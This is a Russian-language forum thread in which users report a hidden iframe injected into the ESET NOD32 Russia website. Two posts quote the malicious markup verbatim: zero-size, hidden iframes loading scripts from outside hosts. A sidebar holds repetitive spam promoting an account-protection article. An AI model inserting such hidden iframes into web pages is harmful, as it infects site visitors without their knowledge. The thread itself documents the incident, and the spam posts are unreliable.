Перейти к содержанию

Recommended Posts

Umnik

На http://esetnod32.ru/ висит скрытый фрейм:

</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe></html>

Говорят, минимум второй день висит.

Поделиться сообщением

ALEX(XX)

Поделиться сообщением

Alex_Goodwin

http://www.virustotal.com/ru/analisis/4477...5fac-1258711260

newiframe.com/s/in.cgi?6script-search-www.com/index.phpscript-meta09.com/index/index.php

Поделиться сообщением

EzzO

ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?

Поделиться сообщением

Skorpion

iFrame я больше не вижу на странице.

Поделиться сообщением

Cooller

Уже значит убрали.

Сейчас они типа расследование будут проводить.

Поделиться сообщением

Lias

ага

По данному инциденту в настоящее время проводится проверка.

вот интересно - а взламывали ли сайты других вендоров??

Поделиться сообщением

Cooller
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.

Поделиться сообщением

Lias

Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?

Поделиться сообщением

Евгений Павлович

Жесть ваще....Заговор внутри компании? ))

Поделиться сообщением

priv8v
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..

Поделиться сообщением

Евгений Павлович
м.б типичное разгильдяйство?..

Это, скорее всего, уже как следствие! )

Поделиться сообщением

vaber

Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Поделиться сообщением

A.

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? :)

• Upvote 5

Поделиться сообщением

Skorpion

Антивирусы реагируют?

Поделиться сообщением

Евгений Павлович

У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))

Ваще жесть....дааааааа

Поделиться сообщением

Zilla

Форум anti-malware.ru атакован спамерами?

Поделиться сообщением

Евгений Павлович
Форум anti-malware.ru атакован спамерами?

Это почему?

Поделиться сообщением

Zilla

Ну по моим личным наблюдениям сложилось такое мнение :)

Поделиться сообщением

Евгений Павлович

А сайт до сих пор инфицирован...уже и письмо им написал, и позвонил....Без толку!

Поделиться сообщением

Danilka
Антивирусы реагируют?

KIS 2010 да.

Поделиться сообщением

Евгений Павлович

А НОД не реагирует! ((

Поделиться сообщением

Fox

Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Поделиться сообщением

Евгений Павлович
Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Остаётся только задуматься!

Поделиться сообщением

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

• Moraband
      Маил ру, увы, сейчас постепенно захватывает все соц. сети, при этом принося ворох проблем. Последнее время в Вконтакте активизировались мошенники-взломщики, с которыми соц. сеть почему то борется очень слабенько, почти ничего не делая. Если бы блокировали по айпи адресу взломщиков, было бы куда лучше, но увы, этого скорее всего никогда не будет. Потому пользователям надо научиться защищать самостоятельно свой аккаунт и благо способы есть. Мне друг посоветовал статью по защите страницы в ВК от взломов , благодаря которой я могу узнать про различные виды взломов и как им противостоять в этих непростых условиях, всем советую ознакомиться, надеюсь, что сумел кому-то помочь. 
    • Moraband
      А сейчас все чаще практикуют совсем другие взломы, взломы Вконтакте. Вот у меня такое совсем недавно было, взламывали мою страницу. Сейчас еще пошел новый тренд  по мошенническим схемам. Начали просить денег, а друг поверил, что это я и скинул денег. Вообще основная проблема этих взломов, что люди думают, дескать их никогда не взломают, а на деле  это очень даже возможно, особенно если страница достаточно популярна и ее легко найти в поиске. Потому будьте осторожнее и лучше изучите статью, как защитить свой аккаунт Вконтакте   , тут очень хорошо написано, как эффективно бороться с мошенническими схемами, взломщиками и мошенниками, которые уже заполонили просторы ВК. Надеюсь, что взломанных станет хоть чуточку меньше =)
    • Moraband
      Ой, столько мошенников развелось сейчас в интернете, пруд пруди. Недавно столкнулся с новым веянием взломов в Вконтакте и вымогательства денег у друзей пользователя. Сам на такое и попал, а мой друг доверчивый и поверил в бредни, которые рассказывал взломщик, перевел ему 5к руб. От такого никто не застрахован, а причиной большого количества взломов выступает отсутствие знаний у простых пользователей. Потому, вот тут смотрите как защитить свой аккаунт от взлома , это очень полезно и реально даст возможность спать спокойно спать и быть точно уверенным, что в этот момент кто-то не вытягивает последние кровные из ваших друзей. 
    • Moraband
      Вообще мошенников в ВК развелось пруд пруди. Знаю и другие виды мошенничества. Сейчас стали активно практиковать взломы ВК и просьбы денег у друзей человека. У меня такое было и один из моих друзей даже повелся. Люди ведь разные бывают, есть и доверчивые. Потому чтобы сберечь деньги своих друзей и свою репутацию лучше ознакомьтесь со статьей, которая поможет защитить аккаунт , мне друг ее скинул, тут очень хорошо и детально расписано как противостоять мошенникам, какие виды мошенничества и взлома могут быть, лучше знать и защитить свой аккаунт, чем потом краснеть перед друзьями.
    • Moraband
      Cейчас индустрию вконтакте захлеснула проблема, связанная с тем, что нахлынули толпы взломщиков и мошенников. Кризис в странах СНГ порождает взломщиков, которые ищут как обогатиться. Меня вот недавно несколько раз взламывали с целью написания моим друзьям просьб с моей страницы, дескать "помоги с деньгами" и скидывали свою карту. Потому надо быть осторожнее, всем советую изучить статью, как защитить свой аккаунт  , потому что существует очень много видов взлома, а многие не знают о них и попадают на удочку, а в этой статье они все расписаны и так же даны методы для защиты себя. Надеюсь, что сумел кому-то помочь.